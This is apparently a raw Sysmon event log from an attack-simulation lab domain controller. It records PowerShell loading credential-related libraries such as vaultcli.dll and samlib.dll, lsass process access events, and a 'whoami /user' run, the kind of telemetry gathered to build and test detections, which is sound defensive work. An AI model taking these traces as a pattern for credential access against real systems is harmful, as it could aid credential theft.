51821 10341000x800000000000000034993Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:27.367{CB3070D7-7998-6042-0C00-00000000AD01}8526012C:\Windows\system32\svchost.exe{CB3070D7-7997-6042-0B00-00000000AD01}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034992Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:27.367{CB3070D7-7997-6042-0B00-00000000AD01}628848C:\Windows\system32\lsass.exe{CB3070D7-7998-6042-1000-00000000AD01}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000034991Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:27.364{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=238366C2A29262BA3FDB0D9D6D02802C,SHA256=99E693600191AED3C44A4B6D5CDC74CD93F5A3A9418866BCF1EF0523D74C9A88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034990Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:27.292{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0A36932217BA7238A4CEC109FAA41D64,SHA256=91D7FFF094CCC47B91444C6C6C33AE40018EE989A1761CE9574AF1079846A83E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034989Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:27.292{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=93B7ED6E0B0CD987A211CF00D05DC706,SHA256=A04A2A298DEF347CA1FF9466E0E84B4EBEDC165D5400345FE1420B02E71D270D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000034996Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:24.458{CB3070D7-7A38-6042-DF00-00000000AD01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-725.attackrange.local61918-false10.0.1.12-8000- 23542300x800000000000000034995Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:28.286{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDB77D640851FA65BDFE7F91272D6FC7,SHA256=09FA5E4200DB56CCA012C78DADC46A9146DA5BFF9C946BDF25772E68299E7531,IMPHASH=00000000000000000000000000000000falsetrue 734700x800000000000000035001Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:30.987{CB3070D7-8517-6042-7E06-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WinSCard.dll10.0.14393.2273 (rs1_release_1.180427-1811)Microsoft Smart Card APIMicrosoft® Windows® Operating SystemMicrosoft Corporationwinscard.dllMD5=85E2B5FCB057B0476687CCFE28E589A5,SHA256=4B99A7709FAC8E9CF95AA186651BE455C0998414E2D2D807DF1B000EB26FBD15,IMPHASH=8E9831D203C36A499228D7F02C6B90D8trueMicrosoft WindowsValid 734700x800000000000000035000Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:30.972{CB3070D7-8517-6042-7E06-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\hid.dll10.0.14393.0 (rs1_release.160715-1616)Hid User LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationhid.dllMD5=DDEB02D7BCB0A346600A3160203C2C95,SHA256=77FD468B4C46A75312426E4368389057EFED233844CF1BC8468983EEC160F178,IMPHASH=A3D80A73BEB6EED1400E993AE6A5B1C3trueMicrosoft WindowsValid 734700x800000000000000034999Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:30.972{CB3070D7-8517-6042-7E06-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\samlib.dll10.0.14393.0 (rs1_release.160715-1616)SAM Library DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSAMLib.DLLMD5=4C413FEDB1B88DA18059890CE0BC95D1,SHA256=FAD279CE82D1616A533D6E5D3A20543B51FDBDDE4C764E09F6A01C8B0E44218A,IMPHASH=BF11630905AADA27934CD5411323FA5BtrueMicrosoft WindowsValid 734700x800000000000000034998Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:30.952{CB3070D7-8517-6042-7E06-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 23542300x800000000000000034997Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:30.293{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DAAA62E49185C2AA61F8765CB9EC72D,SHA256=BE0072E2D0EB5A061F876D693DE3A60B3590521FA58CF8D0524BFBC83A426B7D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000035012Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:31.790{CB3070D7-8517-6042-7F06-00000000AD01}69766996C:\Windows\system32\conhost.exe{CB3070D7-8E93-6042-EC07-00000000AD01}5400C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035011Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:31.788{CB3070D7-7998-6042-0C00-00000000AD01}8526012C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035010Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:31.788{CB3070D7-7998-6042-0C00-00000000AD01}8526012C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035009Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:31.787{CB3070D7-7998-6042-0C00-00000000AD01}8526012C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035008Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:31.787{CB3070D7-7998-6042-0C00-00000000AD01}8526012C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035007Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:31.787{CB3070D7-84F0-6042-4506-00000000AD01}4956372C:\Windows\system32\csrss.exe{CB3070D7-8E93-6042-EC07-00000000AD01}5400C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000035006Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:31.787{CB3070D7-8517-6042-7E06-00000000AD01}69567108C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{CB3070D7-8E93-6042-EC07-00000000AD01}5400C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|UNKNOWN(00007FFFAFCF331B)|UNKNOWN(00007FFFAF1941A5)|UNKNOWN(00007FFFAF193E76)|UNKNOWN(00007FFFAFC454DB)|UNKNOWN(00007FFFAF154A0C)|UNKNOWN(00007FFFAF1B2EDB)|UNKNOWN(00007FFFAF196540)|UNKNOWN(00007FFFAF196540)|UNKNOWN(00007FFFAF196540)|UNKNOWN(00007FFFAF196540)|UNKNOWN(00007FFFAF1963D1)|UNKNOWN(00007FFFAF188356)|UNKNOWN(00007FFFAF1C14E6)|UNKNOWN(00007FFFAF1C1189)|UNKNOWN(00007FFFAF1B83CC)|UNKNOWN(00007FFFAF1941A5)|UNKNOWN(00007FFFAF193E76) 154100x800000000000000035005Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:31.787{CB3070D7-8E93-6042-EC07-00000000AD01}5400C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe" /userC:\Users\Administrator\ATTACKRANGE\Administrator{CB3070D7-84F1-6042-49AD-440000000000}0x44ad492HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{CB3070D7-8517-6042-7E06-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 734700x800000000000000035004Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:31.134{CB3070D7-8517-6042-7E06-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\vaultcli.dll10.0.14393.4169 (rs1_release.210107-1130)Credential Vault Client LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationvaultcli.dllMD5=3A4413FEB384CA47420B1A7CB9099BF0,SHA256=338D718FF68D1ACF8AFC366E923B44128E821DDD50A9C282A5F55502BAF288FA,IMPHASH=E0B17C1B749544B11E7164BC8880263EtrueMicrosoft WindowsValid 10341000x800000000000000035003Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:31.119{CB3070D7-7997-6042-0B00-00000000AD01}628848C:\Windows\system32\lsass.exe{CB3070D7-8517-6042-7E06-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035002Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:31.119{CB3070D7-7997-6042-0B00-00000000AD01}628848C:\Windows\system32\lsass.exe{CB3070D7-8517-6042-7E06-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035038Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.373{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2C00-00000000AD01}2184C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035037Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.373{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2C00-00000000AD01}2184C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035036Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-8500-6042-6A06-00000000AD01}1096C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035035Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-8500-6042-6A06-00000000AD01}1096C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035034Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-8500-6042-6A06-00000000AD01}1096C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035033Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-8500-6042-6A06-00000000AD01}1096C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035032Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-8500-6042-6A06-00000000AD01}1096C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035031Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-8500-6042-6A06-00000000AD01}1096C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035030Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-8500-6042-6A06-00000000AD01}1096C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035029Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:32.372{CB3070D7-7998-6042-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{CB3070D7-8500-6042-6A06-00000000AD01}1096C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035028Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 